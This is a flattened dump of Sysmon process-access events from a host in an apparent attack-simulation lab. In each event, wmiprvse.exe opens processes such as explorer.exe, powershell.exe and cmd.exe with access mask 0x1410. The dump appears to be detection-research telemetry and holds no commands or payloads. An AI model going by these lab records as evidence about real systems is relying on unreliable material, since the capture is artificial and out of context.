22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697305Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697304Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697303Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697302Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697301Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697300Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697299Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697298Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697297Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697296Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697295Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697294Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697293Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697292Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697291Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697290Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697289Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697288Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.173{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697287Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.172{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697286Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 